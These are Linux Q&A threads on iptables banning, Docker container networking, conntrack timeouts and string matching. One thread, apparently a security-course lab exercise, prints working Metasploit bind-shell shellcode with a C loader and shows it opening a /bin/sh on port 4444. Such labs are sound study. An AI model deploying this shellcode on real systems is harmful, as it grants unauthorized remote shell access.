iptables block IP for x hours not working? - linux

On my Linux server, I want to ban, for 24 hours, any IP that accesses certain ports. For this, I use the following iptables rules:
# Check if IP is on banlist, if yes then drop
-A INPUT -m state --state NEW -j bancheck
-A bancheck -m recent --name blacklist --rcheck --reap --seconds 86400 -j LOG --log-prefix "IPT blacklist_ban: "
-A bancheck -m recent --name blacklist --rcheck --reap --seconds 86400 -j DROP
# PUT IPs on banlist
-A banlist -m recent --set --name blacklist -j LOG --log-prefix "IPT add_IP_to_blacklist: "
-A banlist -j DROP
# Ban access to these ports
-A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -j LOG --log-prefix "IPT syn_naughty_ports: "
-A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -j banlist
In the logs, I can verify that this works:
Mar 13 02:12:23 kernel: [39534099.648488] IPT syn_naughty_ports: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=29768 DF PROTO=TCP SPT=65315 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 02:12:23 kernel: [39534099.648519] IPT add_IP_to_blacklist: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=...4 LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=29768 DF PROTO=TCP SPT=65315 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 02:12:26 kernel: [39534102.664136] IPT blacklist_ban: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=4724 DF PROTO=TCP SPT=65315 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
But then the logs also show that just over 2 hours later, the same IP accesses my system again. Rather than being blocked right at the start by the "bancheck" chain, the IP can reach the port again, which results in it being put on the "banlist" a second time (the destination port was 25 in both cases).
Mar 13 04:35:59 kernel: [39542718.875859] IPT syn_naughty_ports: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=4533 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 04:35:59 kernel: [39542718.875890] IPT add_IP_to_blacklist: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=4533 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 04:36:02 kernel: [39542721.880524] IPT blacklist_ban: IN=eth0 OUT= MAC=... DST=... LEN=52 TOS=0x00 PREC=0x00 TTL=113 ID=12505 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
Mar 13 04:36:08 kernel: [39542727.882973] IPT blacklist_ban: IN=eth0 OUT= MAC=... SRC=218.189.140.2 DST=... LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=29092 DF PROTO=TCP SPT=57719 DPT=25 WINDOW=8192 RES=0x00 SYN URGP=0
But if I understand the iptables rules correctly, as long as the IP is within the 24-hour window it should be blocked by the first few lines, and never get far enough down the rule set to hit the ports rule and be put on the "banlist" again.
Am I doing something wrong, or do I misunderstand the way the rules work?

Working example for ssh from my server
iptables -X black
iptables -N black
iptables -A black -m recent --set --name blacklist -j DROP
iptables -X ssh
iptables -N ssh
iptables -I ssh 1 -m recent --update --name blacklist --reap --seconds 86400 -j DROP
iptables -A INPUT -p TCP --dport ssh -m state --state NEW -j ssh
Don't forget to create the iptables chains with iptables -N
Compare this with your config and see if there are any notable differences.
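For comparison, here is a minimal sketch of the same pattern applied to the naughty-ports rules from the question (LOG rules left out for brevity; note that --update, unlike --rcheck, also refreshes the 86400-second timer every time a listed IP hits again):
iptables -N bancheck
iptables -A bancheck -m recent --update --name blacklist --reap --seconds 86400 -j DROP
iptables -I INPUT 1 -m state --state NEW -j bancheck
iptables -N banlist
iptables -A banlist -m recent --set --name blacklist -j DROP
iptables -A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -m state --state NEW -j banlist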
A more elegant solution would be to use ipset combined with iptables:
timeout
All set types supports the optional timeout parameter when creating a set and adding entries. The value of the timeout parameter for the create command means the default timeout value (in seconds) for new entries. If a set is created with timeout support, then the same timeout option can be used to specify non-default timeout values when adding entries. Zero timeout value means the entry is added permanent to the set. The timeout value of already added elements can be changed by readding the element using the -exist option.
Example:
ipset create test hash:ip timeout 300
ipset add test 192.168.0.1 timeout 60
ipset -exist add test 192.168.0.1 timeout 600
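As a rough sketch of how such a set could be wired into iptables (set name and port list are taken over from the question; the set match and the SET target need ipset/xt_set support):
ipset create blacklist hash:ip timeout 86400
iptables -A INPUT -m set --match-set blacklist src -j DROP
iptables -A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -j SET --add-set blacklist src
iptables -A INPUT -p tcp -m multiport --dports 23,25,445,1433,2323,3389,4899,5900 -j DROP
Every IP added via the SET target inherits the set's default 24-hour timeout and is dropped by the first rule until the entry expires.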

Related

Docker container cannot connect to the Internet, ping works, wget fails

I have been trying to find a solution for days now and ended up asking a question here.
I have Debian 10 with Docker installed. A container connects to the other containers without any problem, but I cannot figure out what needs to be done to access the Internet from the containers.
A container can run a ping and gets replies:
docker run -i -t busybox ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
64 bytes from 8.8.8.8: seq=0 ttl=53 time=10.156 ms
64 bytes from 8.8.8.8: seq=1 ttl=53 time=10.516 ms
64 bytes from 8.8.8.8: seq=2 ttl=53 time=10.218 ms
64 bytes from 8.8.8.8: seq=3 ttl=53 time=10.487 ms
Unfortunately, when I try to use wget it fails:
docker run -i -t busybox wget -S -T 5 http://google.com
Connecting to google.com (216.58.209.14:80)
wget: download timed out
The container's DNS seems to be properly set up:
docker run -i -t busybox cat /etc/resolv.conf
nameserver 8.8.8.8
nameserver 8.8.4.4
OS details and docker version:
uname -a
Linux host1 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
docker -v
Docker version 19.03.8, build afacb8b7f0
Docker bridge network details:
docker network inspect bridge
[
    {
        "Name": "bridge",
        "Id": "970f8f04c009361b831d8ff8b4fa6d223645aadbbe93a27576d4934c0a8710e0",
        "Created": "2020-04-23T17:15:37.376767708+02:00",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.17.0.0/16",
                    "Gateway": "172.17.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {},
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]
iptables is enabled and configured; however, I have also tried with cleared rules (ACCEPT all) and still had no luck:
iptables -nvL
Chain INPUT (policy DROP 484 packets, 40785 bytes)
pkts bytes target prot opt in out source destination
2 116 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 state NEW
2501 309K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
3 192 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1337
0 0 ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0
8 498 ACCEPT udp -- * * 0.0.0.0/0 0.0.0.0/0 udp dpt:1194 state NEW
10 640 ACCEPT all -- tun0 * 0.0.0.0/0 0.0.0.0/0
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
70 4889 DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0
46 3449 DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0
14 1164 ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0
24 1607 ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0
8 678 ACCEPT all -- tun0 * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- tun0 ens192 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
0 0 ACCEPT all -- ens192 tun+ 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
Chain OUTPUT (policy ACCEPT 10 packets, 733 bytes)
pkts bytes target prot opt in out source destination
1782 1233K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
0 0 ACCEPT all -- * lo 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * tun0 0.0.0.0/0 0.0.0.0/0
Chain DOCKER (1 references)
pkts bytes target prot opt in out source destination
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
pkts bytes target prot opt in out source destination
24 1607 DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
46 3449 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-USER (1 references)
pkts bytes target prot opt in out source destination
24 1440 REJECT tcp -- ens192 * 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable
46 3449 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-ISOLATION-STAGE-2 (1 references)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0
24 1607 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
iptables -t nat -nvL
Chain PREROUTING (policy ACCEPT 516 packets, 43250 bytes)
pkts bytes target prot opt in out source destination
290 14045 DOCKER all -- * * 0.0.0.0/0 0.0.0.0/0 ADDRTYPE match dst-type LOCAL
Chain INPUT (policy ACCEPT 18 packets, 1101 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 10 packets, 744 bytes)
pkts bytes target prot opt in out source destination
10 590 MASQUERADE all -- * !docker0 172.17.0.0/16 0.0.0.0/0
0 0 MASQUERADE tcp -- * * 172.17.0.2 172.17.0.2 tcp dpt:80
Chain OUTPUT (policy ACCEPT 9 packets, 666 bytes)
pkts bytes target prot opt in out source destination
0 0 DOCKER all -- * * 0.0.0.0/0 !127.0.0.0/8 ADDRTYPE match dst-type LOCAL
Chain DOCKER (2 references)
pkts bytes target prot opt in out source destination
0 0 RETURN all -- docker0 * 0.0.0.0/0 0.0.0.0/0
Any idea why my containers cannot connect to the outside world?
EDIT:
I have tried completely cleaning up my iptables rules and allowing all traffic:
iptables -nvL
Chain INPUT (policy ACCEPT 12968 packets, 945K bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 83 packets, 7850 bytes)
pkts bytes target prot opt in out source destination
iptables -t nat -nvL
Chain PREROUTING (policy ACCEPT 12871 packets, 939K bytes)
pkts bytes target prot opt in out source destination
Chain INPUT (policy ACCEPT 37 packets, 1856 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 29 packets, 2447 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 29 packets, 2447 bytes)
pkts bytes target prot opt in out source destination
iptables -t mangle -nvL
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
In this case, even pings do not go out of the container:
docker run -i -t busybox ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8): 56 data bytes
--- 8.8.8.8 ping statistics ---
7 packets transmitted, 0 packets received, 100% packet loss
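Two hedged observations from the rule listings above, not a definitive diagnosis: the REJECT rule in DOCKER-USER matches all forwarded TCP arriving on ens192, and DOCKER-USER is evaluated before the RELATED,ESTABLISHED accept in FORWARD, so TCP replies to the containers would be rejected while ICMP passes (ping works, wget times out); and flushing the nat table also removes Docker's own MASQUERADE rule (the POSTROUTING chain above is now empty), so after the flush even pings have no source NAT. Assuming ens192 is the uplink interface, a quick test could be:
# let reply traffic through DOCKER-USER before the REJECT rule
iptables -I DOCKER-USER 1 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
# after flushing everything, let Docker re-create its own NAT/FORWARD rules
systemctl restart docker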

How to run the linux/x86/shell_bind_tcp payload stand alone?

I'm running a Metasploit payload in a sandbox C program.
Below is a summary of the payload of interest. From there I generate some shellcode and load it up in my sandbox, but when I run it the program will simply wait. I think this is because it's waiting for a connection to send the shell, but I'm not sure.
How would I go from:
Generating shellcode
Loading it into my sandbox
Successfully getting a /bin/sh shell <- this is the part I'm stuck on.
Basic setup:
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
[sudo] password for max:
Name: Linux Command Shell, Bind TCP Inline
Module: payload/linux/x86/shell_bind_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 200
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Generating shellcode:
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
Sandbox program with shellcode:
#include<stdio.h>
#include<string.h>
/*
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
*/
unsigned char code[] = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
int main(void)
{
    /* strlen() stops at the first \x00 byte in the payload, so this prints 20,
       not the payload's full 78-byte length. */
    printf("Shellcode Length: %d\n", (int)strlen(code));
    int (*ret)() = (int (*)())code;
    ret();
    return 0;
}
Compile and run. However, this is where I'm not sure how to get a /bin/sh shell:
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
(program waiting here...waiting for a connection?)
Edit:
In terminal one I run my shellcode program:
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
Now, in terminal two, I check for TCP listeners, giving -n to suppress host-name resolution, -t for TCP, -l for listeners, and -p to see the program names.
I can see the shellcode program on port 4444:
max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 14885/shellcode
max@ubuntu-vm:~$
Connecting with telnet seems to succeed, but there is still no sh shell.
max@ubuntu-vm:~$ telnet 0.0.0.0 4444
Trying 0.0.0.0...
Connected to 0.0.0.0.
Escape character is '^]'.
How do I get an sh shell?
Generate shellcode, compile and run:
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
* linux/x86/shell_bind_tcp - 78 bytes
* http://www.metasploit.com
* VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependSetresgid=false,
* PrependSetregid=false, PrependSetgid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 20
Now, in terminal 2, check for listeners and finally connect using netcat. Note that the $ prompt doesn't appear, but the shell is still there:
max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 3326/shellcode
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max 591 Jan 2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max 591 Jan 2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max 471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max 471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max 442 Jan 2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max 442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max 139 Dec 27 08:18 compile.sh

Need to drop established connections with iptables

For app testing purposes, I need to simulate a situation where a stateful firewall drops an established TCP connection from client to server on timeout. I installed 3 guest VMs in VirtualBox:
Client, network1 ip: 10.0.2.110
Firewall, network1 ip: 10.0.2.5, network2 ip: 10.0.3.5
Server, network2 ip: 10.0.3.6
Client and Server are Fedora 19 with iptables disabled
Firewall is Ubuntu 13.10 with the following settings:
cat /etc/iptables.conf
*filter
:INPUT ACCEPT [201:13136]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [110:14472]
-A FORWARD -j LOG --log-prefix "[netfilter] "
-A FORWARD -p icmp -j ACCEPT
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -m conntrack --ctstate INVALID -j DROP
-A FORWARD -p tcp -m tcp --dport 2000 -m state --state NEW -j ACCEPT
-A FORWARD -j DROP
COMMIT
sysctl net.netfilter
...
net.netfilter.nf_conntrack_tcp_timeout_close = 10
net.netfilter.nf_conntrack_tcp_timeout_close_wait = 60
net.netfilter.nf_conntrack_tcp_timeout_established = 30
net.netfilter.nf_conntrack_tcp_timeout_fin_wait = 120
net.netfilter.nf_conntrack_tcp_timeout_last_ack = 30
net.netfilter.nf_conntrack_tcp_timeout_max_retrans = 30
net.netfilter.nf_conntrack_tcp_timeout_syn_recv = 60
net.netfilter.nf_conntrack_tcp_timeout_syn_sent = 120
net.netfilter.nf_conntrack_tcp_timeout_time_wait = 30
net.netfilter.nf_conntrack_tcp_timeout_unacknowledged = 30
...
With these settings, conntrack/iptables should drop established TCP connections after 30 seconds of inactivity.
To run the test, I set up "server" on Server:
# ncat -l 2000 --keep-open --exec "/bin/cat"
and connect there with telnet on Client:
$ telnet 10.0.3.6 2000
Trying 10.0.3.6...
Connected to 10.0.3.6.
Escape character is '^]'.
In the iptables log I get a normal TCP handshake:
Dec 2 12:24:23 ubuntu kernel: [ 5231.169804] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=60 TOS=0x10 PREC=0x00 TTL=63 ID=44926 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=29200 RES=0x00 SYN URGP=0
Dec 2 12:24:23 ubuntu kernel: [ 5231.170489] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=28960 RES=0x00 ACK SYN URGP=0
Dec 2 12:24:23 ubuntu kernel: [ 5231.171315] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=52 TOS=0x10 PREC=0x00 TTL=63 ID=44927 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK URGP=0
While the connection is established, I send several packets with telnet, and with the # conntrack -L command I get:
tcp 6 24 ESTABLISHED src=10.0.2.110 dst=10.0.3.6 sport=47899 dport=2000 src=10.0.3.6 dst=10.0.2.110 sport=2000 dport=47899 [ASSURED] mark=0 use=1
And in the iptables log I get:
Dec 2 12:24:38 ubuntu kernel: [ 5245.917564] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=55 TOS=0x10 PREC=0x00 TTL=63 ID=44928 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK PSH URGP=0
Dec 2 12:24:38 ubuntu kernel: [ 5245.917961] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=36952 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=227 RES=0x00 ACK URGP=0
Dec 2 12:24:38 ubuntu kernel: [ 5245.918326] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=55 TOS=0x00 PREC=0x00 TTL=63 ID=36953 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=227 RES=0x00 ACK PSH URGP=0
Dec 2 12:24:38 ubuntu kernel: [ 5245.918535] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=52 TOS=0x10 PREC=0x00 TTL=63 ID=44929 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK URGP=0
that's also OK.
Next, I wait for several minutes and check that # conntrack -L returns an empty table. Then I send some more packets with telnet and expect the session to freeze or say something like "connection closed", but, to my surprise, the connection isn't actually closed and I get these messages in the iptables log:
Dec 2 12:29:51 ubuntu kernel: [ 5558.925402] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=55 TOS=0x10 PREC=0x00 TTL=63 ID=44930 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK PSH URGP=0
Dec 2 12:29:51 ubuntu kernel: [ 5558.925927] [netfilter] IN=eth1 OUT=eth0 MAC=08:00:27:00:72:8c:08:00:27:74:b7:df:08:00 SRC=10.0.3.6 DST=10.0.2.110 LEN=55 TOS=0x00 PREC=0x00 TTL=63 ID=36954 DF PROTO=TCP SPT=2000 DPT=47899 WINDOW=227 RES=0x00 ACK PSH URGP=0
Dec 2 12:29:51 ubuntu kernel: [ 5558.926237] [netfilter] IN=eth0 OUT=eth1 MAC=08:00:27:b8:68:9f:08:00:27:4f:ee:15:08:00 SRC=10.0.2.110 DST=10.0.3.6 LEN=52 TOS=0x10 PREC=0x00 TTL=63 ID=44931 DF PROTO=TCP SPT=47899 DPT=2000 WINDOW=229 RES=0x00 ACK URGP=0
There is no TCP handshake that would indicate telnet silently re-established the connection, and no difference from the previous log, where the connection was established according to conntrack.
How can I really make iptables close an established connection after 30 seconds of inactivity?
This might not be the answer, but some explanation of the behaviour: it seems that ip_conntrack tries to allocate, on the external interface, the same source port the internal client used, if it is available. That means that even after a complete wipe of the conntrack table the connection is "transparently" re-established on the same port and TCP sees no interruption. You could actually consider this a feature.
To verify this behaviour you would need 2 clients with the same source port connecting to the outside world, and then check conntrack again (hard to simulate, as the OS assigns source port numbers freely). You should then get 2 different port numbers. Only in that case might the TCP connection recognize that something happened in the meantime (which will mean a closed connection in most cases)...
Try inserting -m state --state INVALID -j DROP into FORWARD; this drops packets that do not belong to an established connection.
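A hedged sketch building on the two answers above, assuming the goal is that packets of an expired connection are no longer silently picked up mid-stream (by default net.netfilter.nf_conntrack_tcp_loose=1, which lets conntrack adopt an in-progress connection from a non-SYN packet, i.e. the "transparent" re-establishment described above):
# on the Firewall VM: stop conntrack from re-adopting connections mid-stream
sysctl -w net.netfilter.nf_conntrack_tcp_loose=0
# drop INVALID packets before any rule can accept them
iptables -I FORWARD 1 -m conntrack --ctstate INVALID -j DROP
With loose tracking disabled, a mid-stream packet that has no conntrack entry is classified INVALID and dropped, instead of creating a fresh ESTABLISHED entry.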

Linux Iptables string module does not match all packets

This is the first time I'm using the string matching module for iptables, and I've run into some strange behaviour I can't overcome.
In short, it looks like iptables passes "trimmed" packets to the module, so the module cannot scan the whole packet for the string.
I can't find any information about such behaviour on the net. All examples and tutorials should work like a charm, but they don't.
Now for the details.
OS: debian testing, kernel 3.2.0-3-686-pae
IPTABLES: iptables v1.4.14
OTHER:
tcpdump version 4.3.0,
libpcap version 1.3.0
# lsmod|grep ipt
ipt_LOG 12533 0
iptable_nat 12800 0
nf_nat 17924 1 iptable_nat
nf_conntrack_ipv4 13726 3 nf_nat,iptable_nat
nf_conntrack 43121 3 nf_conntrack_ipv4,nf_nat,iptable_nat
iptable_filter 12488 0
ip_tables 17079 2 iptable_filter,iptable_nat
x_tables 18121 6
ip_tables,iptable_filter,iptable_nat,xt_string,xt_tcpudp,ipt_LOG
I've reset all rules to the defaults and added only two rules, in the following order:
iptables -t filter -A OUTPUT --protocol tcp --dport 80 --match string --algo bm --from 0 --to 1500 --string "/index.php" --jump LOG --log-prefix "matched :"
iptables -t filter -A OUTPUT --protocol tcp --dport 80 --jump LOG --log-prefix "OUT : "
The idea is obvious: match requests to any IP on port 80 that contain the string /index.php and log them, and also log all data sent to port 80.
So here is iptables -L -xvn:
Chain INPUT (policy ACCEPT 3 packets, 693 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 3 packets, 184 bytes)
pkts bytes target prot opt in out source destination
0 0 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "/index.php" ALGO name bm TO 1500 LOG flags 0 level 4 prefix "matched :"
0 0 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4 prefix "OUT : "
The counters for both rules are zeroed.
OK, now the browser goes to www.gentoo.org/index.php. This URL is just an example for illustration.
So this is the only URL requested in the browser.
And I get the following for iptables -t filter -L -xvn:
Chain INPUT (policy ACCEPT 61 packets, 16657 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 63 packets, 4394 bytes)
pkts bytes target prot opt in out source destination
1 380 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "/index.php" ALGO name bm TO 1500 LOG flags 0 level 4 prefix "matched :"
13 1392 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4 prefix "OUT : "
So we have only ONE match for the 1st rule. But that is wrong. Here is the tcpdump output for the connection.
First, the request to IP 89.16.167.134:
<handshake omitted>
16:56:38.440308 IP 192.168.66.106.54704 > 89.16.167.134.80: Flags [P.], seq 1:373, ack 1, win 913,
options [nop,nop,TS val 85359 ecr 3026115253], length 372
<...>
0x0030: b45e dab5 4745 5420 2f69 6e64 6578 2e70 .^..GET./index.p
0x0040: 6870 2048 5454 502f 312e 310d 0a48 6f73 hp.HTTP/1.1..Hos
0x0050: 743a 2077 7777 2e67 656e 746f 6f2e 6f72 t:.www.gentoo.or
0x0060: 670d 0a55 7365 722d 4167 656e 743a 204d g..User-Agent:.M
0x0070: 6f7a 696c 6c61 2f35 2e30 2028 5831 313b ozilla/5.0.(X11;
Here we see one match in the HTTP GET. A few packets later we have a request for more content, to IP 140.211.166.176:
16:56:38.772432 IP 192.168.66.106.59766 > 140.211.166.176.80: Flags [P.], seq 1:329, ack 1, win 913,
options [nop,nop,TS val 85442 ecr 110101513], length 328
<...>
0x0030: 0690 0409 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1
<...>
0x0130: 6566 6c61 7465 0d0a 436f 6e6e 6563 7469 eflate..Connecti
